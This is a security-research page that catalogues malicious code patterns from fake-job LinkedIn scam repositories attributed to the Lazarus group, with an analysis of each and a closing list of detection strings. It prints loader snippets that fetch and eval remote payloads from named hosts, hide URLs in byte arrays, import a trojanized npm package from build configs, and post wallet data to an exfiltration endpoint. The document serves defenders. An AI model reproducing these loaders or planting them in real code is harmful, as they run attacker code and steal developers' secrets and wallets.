
Code Samples

Real malicious code patterns from LinkedIn scam repositories

7 patterns · 13 repositories · DPRK / Lazarus

Malicious Code Patterns

Remote eval() via API

Most common
critical
exports.getCookie = asyncErrorHandler(async (req, res, next) => {
  const result = await axios.get(
    "https://api.npoint.io/ac2916e3f543effa2edd"
  );
  eval(result.data.cookie);
})();

Fetches obfuscated JavaScript from a remote API endpoint and executes it with eval(). The trailing () invokes the wrapped handler immediately, so the payload runs as soon as the module is required, not when a request reaches the route. The payload contains a full reverse shell, clipboard monitor, and file exfiltration toolkit.

Seen in: userController.js, controller.js, paymentRoute.js, authHelper.js, wallet.js

Byte-array URL obfuscation

Golden City v2
critical
const byteArray = [104,116,116,112,115,58,47,47,97,112,105,...];
const uint8Array = new Uint8Array(byteArray);
const decoder = new TextDecoder('utf-8');
axios.get(decoder.decode(uint8Array)).then(response => {
  new Function("require", response.data.cookie)(require);
});

Hides the malicious URL as a byte array to evade string-based detection: a grep for the domain finds nothing until the array is decoded. At runtime it decodes the bytes, fetches the payload, and executes it via new Function() with require passed in as an argument.

Seen in: next.config.js, config/setup.js

new Function() variant

Sarostech
critical
const createHandler = (errCode) => {
  const handler = new Function("require", errCode);
  return handler;
};
// errCode holds the fetched payload string; calling the result with
// require hands the payload a working module loader
const handlerFunc = createHandler(errCode);
handlerFunc(require);

Uses new Function() constructor to create a function from a string and passes Node.js require as argument, giving the payload full access to the filesystem and network.

Seen in: utils/errorHandler.js, middleware/auth.js

Malicious npm package

ERC20 DApp
critical
// vite.config.js
import { fetchIcon } from "cdn-icon-fetch";
fetchIcon("77"); // triggers malware

Uses a trojanized npm package disguised as an icon utility. The package runs malware on import, and because vite.config.js is evaluated by the Vite CLI itself, the import fires on any vite dev or vite build, before any application code runs. Other known packages: icon-font-fetch, asset-icon-fetch, materials-icons.

Seen in: vite.config.js, package.json

Payment route disguise

Munity Game
critical
router.post("/process-payment", async (req, res) => {
  const response = await axios.get(
    "https://api.npoint.io/f7578d215b0835ed169c"
  );
  eval(response.data.verification);
});

Disguises malware as payment processing logic. The eval() call executes the remote payload on the first POST to /process-payment, which typically happens while the route is exercised during development or testing.

Seen in: routes/payment.js, controllers/paymentController.js

Obfuscated next.config.js

Multify Staking
high
// next.config.js — malware hidden BEFORE the legitimate config
const _0x4a2b = ['\x68\x74\x74\x70\x73\x3a\x2f\x2f',...];
(function(_0x1a2b, _0x3c4d) {
  eval(Buffer.from(_0x4a2b.join('')).toString());
})();

// Normal Next.js config below — you'd never scroll up
/** @type {import('next').NextConfig} */
const nextConfig = { reactStrictMode: true };
module.exports = nextConfig;

Malicious code is placed before the legitimate Next.js configuration. A developer who jumps to the exported config sees a valid Next.js setup and may never scroll up to the obfuscated payload above it. Since next.config.js is evaluated by next dev and next build, the payload runs on every start.

Seen in: next.config.js

Wallet analytics disguise

Web3Game
critical
// walletConnect.js
const analytics = await axios.get(
  "https://w3capi.marketing/analytics"
);
eval(analytics.data.track);

// Exfiltrates wallet data to w3capi.marketing
const sendData = (d) => axios.post(
  "https://w3capi.marketing/collect", d
);

Hides eval() inside wallet connection logic. Data exfiltration endpoint (w3capi.marketing) is disguised as a web analytics service. Steals private keys and seed phrases.

Seen in: utils/walletConnect.js, lib/web3Provider.js

Quick Detection Patterns

Search for these patterns in any codebase before running it:

eval(result.data
eval(response.data
new Function("require"
axios.get(...).then(r => eval(
Buffer.from(...).toString()
new TextDecoder().decode(new Uint8Array(
npoint.io
w3capi.marketing
cdn-icon-fetch
process.on("uncaughtException", () => {})